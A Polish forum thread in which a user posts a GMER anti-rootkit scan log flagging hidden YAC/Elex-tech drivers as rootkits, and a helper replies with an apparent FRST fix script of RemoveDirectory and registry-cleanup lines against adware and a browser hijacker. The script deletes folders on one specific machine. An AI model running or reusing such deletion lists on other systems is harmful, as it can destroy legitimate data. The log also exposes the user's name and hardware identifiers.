Thread   C:\WINDOWS\system32\svchost.exe [1764:1576]                                                                                                  00007ffd60175be0
Thread   C:\WINDOWS\system32\svchost.exe [1764:1736]                                                                                                  00007ffd60179b30
Thread   C:\WINDOWS\system32\svchost.exe [1764:1740]                                                                                                  00007ffd64952cf0
Thread   C:\WINDOWS\system32\svchost.exe [1876:2000]                                                                                                  00007ffd6dedb310
Thread   C:\WINDOWS\system32\svchost.exe [1876:2028]                                                                                                  00007ffd603144b0
Thread   C:\WINDOWS\system32\svchost.exe [1876:1564]                                                                                                  00007ffd6a546750
Thread   C:\WINDOWS\System32\spoolsv.exe [1928:7424]                                                                                                  00007ffd57665bc0
Thread   C:\WINDOWS\System32\spoolsv.exe [1928:7436]                                                                                                  00007ffd57412740
Thread   C:\WINDOWS\System32\spoolsv.exe [1928:7492]                                                                                                  00007ffd66fe1180
Thread   C:\WINDOWS\System32\spoolsv.exe [1928:7496]                                                                                                  00007ffd60948e40
Thread   C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2280:4836]                                                   00007ffd51a9502c
Thread   C:\WINDOWS\system32\svchost.exe [2604:3540]                                                                                                  00007ffd592fc070
Thread   C:\WINDOWS\system32\svchost.exe [2604:3560]                                                                                                  00007ffd592fe6e0
Thread   C:\WINDOWS\system32\svchost.exe [2604:3820]                                                                                                  00007ffd57665bc0
Thread   C:\WINDOWS\system32\svchost.exe [2604:3824]                                                                                                  00007ffd57412740
Thread   C:\WINDOWS\system32\SearchIndexer.exe [3196:4052]                                                                                            00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\SearchIndexer.exe [3196:4056]                                                                                            00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\SearchIndexer.exe [3196:4144]                                                                                            00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\svchost.exe [4164:1896]                                                                                                  00007ffd6750b180
Thread   C:\WINDOWS\system32\svchost.exe [4164:4172]                                                                                                  00007ffd6750f5f0
Thread   C:\WINDOWS\system32\sihost.exe [5268:5908]                                                                                                   00007ffd46d62240
Thread   C:\WINDOWS\system32\mshta.exe [6436:5796]                                                                                                    00007ffd5bbdb8b0
Thread   C:\WINDOWS\system32\mshta.exe [6436:8048]                                                                                                    00007ffd5bb67010
Thread   C:\WINDOWS\system32\svchost.exe [6740:10196]                                                                                                 00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\svchost.exe [6740:10188]                                                                                                 00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:6656]                                                                                                00007ffd61131ba0
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7224]                                                                                                00007ffd623f1160
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7308]                                                                                                00007ffd695430f0
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7312]                                                                                                00007ffd623f1a20
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7316]                                                                                                00007ffd6e438490
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7856]                                                                                                00007ffd3e2fa3b0
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7964]                                                                                                00007ffd56157930
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7968]                                                                                                00007ffd56157930
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:7972]                                                                                                00007ffd56157930
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:8100]                                                                                                00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\taskhostw.exe [7140:8104]                                                                                                00007ffd59c6dbe0
Thread   C:\WINDOWS\system32\wbem\wmiprvse.exe [7536:6392]                                                                                            00007ffd4ac33340
Thread   C:\OEM\Preload\FubTracking\FubTracking.exe [9180:9264]                                                                                       00007ffd5bbdb8b0
Thread   C:\OEM\Preload\FubTracking\FubTracking.exe [9180:9272]                                                                                       00007ffd5bb67010
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9320]                                                                                                  0000000076637ea0
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9924]                                                                                                  0000000000a5d852
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9760]                                                                                                  0000000000a5d852
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9628]                                                                                                  0000000000a5d852
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9540]                                                                                                  0000000000a5d852
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9916]                                                                                                  0000000000a5d852
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:9536]                                                                                                  0000000077a267c0
Thread   C:\WINDOWS\SysWOW64\svchost.exe [9304:7868]                                                                                                  0000000077a267c0
Thread   C:\Windows\explorer.exe [7444:1112]                                                                                                          00007ffd5a4e36f0
Thread   C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [9260:8352]                                                                               00007ffd35ab62a0
Thread   C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [9260:13164]                                                                              00007ffd63a74ff0
Thread   C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [9260:6364]                                                                               00007ffd69591160
Thread   C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe [9100:8280]                                                  00007ffd6c4359c0
Thread   C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe [9100:2948]                                                  00007ffd638c48e0
Thread   C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe [9100:3008]                                                  00007ffd6c4359c0
Thread   C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe [9100:640]                                                   00007ffd4c8ee010
Thread   C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe [9100:12564]                                                 00007ffd6c4359c0
Thread   C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe [9100:2888]                                                  00007ffd4c8ee010
Thread   C:\WINDOWS\system32\taskhostw.exe [3156:12388]                                                                                               00007ffd61e80610

---- Services - GMER 2.2 ----

Service  C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys (*** hidden *** )                                                                         [SYSTEM] iSafeKrnl                                                                                                                                                                                                                                                                                                          <-- ROOTKIT !!!
Service  system32\DRIVERS\iSafeKrnlBoot.sys (*** hidden *** )                                                                                         [MANUAL] iSafeKrnlBoot                                                                                                                                                                                                                                                                                                      <-- ROOTKIT !!!
Service  C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys (*** hidden *** )                                                                      [SYSTEM] iSafeKrnlKit                                                                                                                                                                                                                                                                                                       <-- ROOTKIT !!!
Service  C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys (*** hidden *** )                                                                       [SYSTEM] iSafeKrnlR3                                                                                                                                                                                                                                                                                                        <-- ROOTKIT !!!
Service  system32\DRIVERS\iSafeNetFilter.sys (*** hidden *** )                                                                                        [SYSTEM] iSafeNetFilter                                                                                                                                                                                                                                                                                                     <-- ROOTKIT !!!
Service  C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe (*** hidden *** )                                                                          [AUTO] iSafeService                                                                                                                                                                                                                                                                                                         <-- ROOTKIT !!!

---- Registry - GMER 2.2 ----

Reg      HKLM\SYSTEM\CurrentControlSet\Control\CMF\SqmData@SystemStartTime                                                                            0xA4 0xB3 0x6C 0x4C ...
Reg      HKLM\SYSTEM\CurrentControlSet\Control\CMF\SqmData@SystemLastStartTime                                                                        0x04 0x1B 0x76 0xB9 ...
Reg      HKLM\SYSTEM\CurrentControlSet\Control\CMF\SqmData@CMFStartTime                                                                               0x4E 0x3E 0x76 0x4C ...
Reg      HKLM\SYSTEM\CurrentControlSet\Control\CMF\SqmData@CMFLastStartTime                                                                           0x59 0x43 0x7D 0xB9 ...
Reg      HKLM\SYSTEM\CurrentControlSet\Control\CMF\SqmData\BootLanguages@pl-PL                                                                        23
Reg      HKLM\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\Configuration\CMN15C90_30_07DD_4B^EB013AF615E80A28BFB2170D119B23AF@Timestamp           0x22 0x31 0x8D 0x4D ...
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Lsa@LsaPid                                                                                             836
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager@PendingFileRenameOperations                                                            \??\C:\WINDOWS\TEMP\020758~1.EXE??\??\C:\Users\Emil\AppData\Local\Temp\~nsu.tmp\Au_.exe??\??\C:\Users\Emil\AppData\Local\Temp\~nsu.tmp??\??\C:\Users\Emil\AppData\Local\Temp\nsbBF87.tmp\??\??\C:\Users\Emil\AppData\Local\Temp\nsbBF87.tmp\Lang\ENU.dll??\??\C:\Users\Emil\AppData\Local\Temp\nsbBF87.tmp\Lang\PLK.dll??
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Executive@UuidSequenceNumber                                                           2907597
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\RNG@RNGAuxiliarySeed                                                            -266172959
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters@BootId                                            24
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters@BaseTime                                          502258410
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power@POSTTime                                                                         3741
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power@FwPOSTTime                                                                       3741
Reg      HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server@InstanceID                                                                             29ea1371-b474-4d9b-be26-83ea7b7
Reg      HKLM\SYSTEM\CurrentControlSet\Control\WDI\Config@ServerName                                                                                  \BaseNamedObjects\WDI_{e345eea1-4969-46d8-a228-01483946436c}
Reg      HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog@FileCounter                                                               3
Reg      HKLM\SYSTEM\CurrentControlSet\Services\BITS\Performance@1008                                                                                 0x33 0x13 0xFC 0x6F ...
Reg      HKLM\SYSTEM\CurrentControlSet\Services\BITS\Performance@PerfMMFileName                                                                       Global\MMF_BITS5787d67e-2f6b-4397-85fc-729de63ed3a2
Reg      HKLM\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Keys\74dfbf750d6c                                                                 
Reg      HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\Probe\{4c330f64-cc04-4aa3-9dfd-a9a09077e4fb}@LastProbeTime                        1492627092
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl                                                                                             
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@Type                                                                                        2
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@Start                                                                                       1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@ErrorControl                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@ImagePath                                                                                   \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@DisplayName                                                                                 YAC Mini-Filter Driver
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@Group                                                                                       FSFilter Activity Monitor
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@DependOnService                                                                             FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@Tag                                                                                         4
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@DebugFlags                                                                                  0
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@SupportedFeatures                                                                           3
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@DependOnGroup                                                                               
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl@Description                                                                                 YAC Mini-Filter Driver
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Instances                                                                                   
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Instances@DefaultInstance                                                                   iSafeKrnl Instance
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Instances\iSafeKrnl Instance                                                               
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Instances\iSafeKrnl Instance@Altitude                                                       382390
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Instances\iSafeKrnl Instance@Flags                                                          0
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Parameters                                                                                 
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl\Parameters@InstallPath                                                                      C:\Program Files (x86)\Elex-tech\YAC\
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl                                                                                             
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot@Type                                                                                    1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot@Start                                                                                   3
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot@ErrorControl                                                                            1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot@ImagePath                                                                               system32\DRIVERS\iSafeKrnlBoot.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot@DisplayName                                                                             YAC Boot Driver
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot@Group                                                                                   Boot Bus Extender
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit@Type                                                                                     1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit@Start                                                                                    1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit@ErrorControl                                                                             1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit@ImagePath                                                                                \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit@DisplayName                                                                              YAC Kit Driver
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit@Group                                                                                    Base
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3@Type                                                                                      1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3@Start                                                                                     1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3@ErrorControl                                                                              1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3@ImagePath                                                                                 \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3@DisplayName                                                                               YAC Ring3 Driver
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter                                                                                       
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@Type                                                                                   1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@Start                                                                                  1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@ErrorControl                                                                           1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@ImagePath                                                                              system32\DRIVERS\iSafeNetFilter.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@DisplayName                                                                            YAC NDIS Driver
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@Group                                                                                  PNP_TDI
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter@Tag                                                                                    9
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter                                                                                       
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@Type                                                                                     16
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@Start                                                                                    2
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@ErrorControl                                                                             1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@ImagePath                                                                                C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@DisplayName                                                                              YAC Service
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@Group                                                                                    Event log
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@WOW64                                                                                    1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@ObjectName                                                                               LocalSystem
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService@Description                                                                              YAC Service
Reg      HKLM\SYSTEM\CurrentControlSet\Services\iSafeService                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\Services\rdyboost\Diagnostics@ReadyBootTrainingCountSinceLastServicing                                         4
Reg      HKLM\SYSTEM\CurrentControlSet\Services\rdyboost\Parameters@LastBootPlanUserTime                                                              ??r.?, ?kwi ?19 ?17, 06:43:23 PM??????????????????????"????????
Reg      HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch@Epoch                                                                              2635
Reg      HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch2@Epoch                                                                             624
Reg      HKLM\SYSTEM\CurrentControlSet\Services\srvnet\Parameters@MajorSequence                                                                       23
Reg      HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}@LeaseObtainedTime                  1492619888
Reg      HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}@T1                                 1492663088
Reg      HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}@T2                                 1492695488
Reg      HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}@LeaseTerminatesTime                1492706288
Reg      HKLM\SYSTEM\CurrentControlSet\Services\TPM@OsBootCount                                                                                       59
Reg      HKLM\SYSTEM\CurrentControlSet\Services\W32Time\SecureTimeLimits@SecureTimeEstimated                                                          0x63 0xA0 0xFA 0xA7 ...
Reg      HKLM\SYSTEM\CurrentControlSet\Services\W32Time\SecureTimeLimits@SecureTimeHigh                                                               0x63 0x08 0xBF 0x09 ...
Reg      HKLM\SYSTEM\CurrentControlSet\Services\W32Time\SecureTimeLimits@SecureTimeLow                                                                0x63 0x38 0x36 0x46 ...
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdBoot@Group                                                                                          Early-Launch
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdBoot@ImagePath                                                                                      system32\drivers\WdBoot.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdBoot@Start                                                                                          0
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdBoot                                                                                               
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdFilter@ImagePath                                                                                    system32\drivers\WdFilter.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdFilter@Start                                                                                        0
Reg      HKLM\SYSTEM\CurrentControlSet\Services\WdFilter                                                                                             
Reg      HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt\Parameters@ServiceDllUnloadOnStop                                                             0
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\0@Rw                                                                                           0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\0@RwMask                                                                                       0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\1@Rw                                                                                           0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\1@RwMask                                                                                       0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\2@Rw                                                                                           0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\2@RwMask                                                                                       0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\3@Rw                                                                                           0x64 0x62 0x03 0x00 ...
Reg      HKLM\SYSTEM\Setup\Upgrade\NsiMigrationRoot\60\3@RwMask                                                                                       0x64 0x62 0x03 0x00 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search@JumpListChangedAppIds                                                                  E7CF176E110C211B?
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData@E7CF176E110C211B                                                          0xE4 0xDF 0x8A 0x82 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\SyncData@PendingOperations                                                        3
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\SyncData\Namespace\browsersettings\wininet-internet-explorer@IsLocalReplicaDirty  1
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@01                 0x00 0x10 0x90 0x68 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@07                 0x00 0x70 0x68 0x97 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@10                 0x00 0xC0 0x91 0x24 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@16                 0x00 0x30 0xDC 0x7F ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@18                 0x00 0xA0 0x8D 0x19 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@24                 0x00 0x70 0xAE 0x43 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@28                 0x00 0xD0 0xD7 0xB7 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@29                 0x00 0x00 0x10 0x00 ...
Reg      HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\CachedSizes\{20202020-2020-2020-897B-602A006B62C1}@00                 0x00 0x10 0x25 0x4C ...

---- Disk sectors - GMER 2.2 ----

Disk     \Device\Harddisk0\DR0                                                                                                                        unknown MBR code

---- Files - GMER 2.2 ----

File     C:\Program Files\WindowsApps\Microsoft.BingNews_4.20.951.0_x64__8wekyb3d8bbwe\Microsoft.Msn.News.dll                                         (size mismatch) 4128768/0 bytes executable

---- EOF - GMER 2.2 ----
emillo2502
~user
 
Posty: 15
Dołączenie: 16 Lis 2013, 14:09



Problem z mozilla i zawieszającym się systemem

Postprzez ordynat 19 Kwi 2017, 23:38

1) Otwórz Notatnik i wklej w nim:
RemoveDirectory: C:\Users\Emil\AppData\Local\Kitty
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Users\Emil\AppData\Local\SNARE
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\Elex-tech
RemoveDirectory: C:\Users\Emil\AppData\Roaming\Elex-tech
RemoveDirectory: C:\Users\Emil\AppData\Local\Firefox
RemoveDirectory: C:\Users\Emil\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Emil\AppData\Local\3DM
RemoveDirectory: C:\Program Files (x86)\Eastness
C:\Users\Public\Documents\report.dat
C:\WINDOWS\System32\Tasks\Milimili
C:\Users\Public\Documents\temp.dat
C:\WINDOWS\SysWOW64\1
R2 SNARE; C:\Users\Emil\AppData\Local\SNARE\Snarer.dll [793600 2017-04-19] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 Kitty; C:\Users\Emil\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [Brak podpisu cyfrowego]
R2 3DM; C:\Users\Emil\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
FF ProfilePath: C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default [2017-04-19]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zao9ohxy.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\zao9ohxy.default -> about:home
FF SearchPlugin: C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\searchplugins\startsearch.xml [2017-04-17]
Edge HomeButtonPage: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
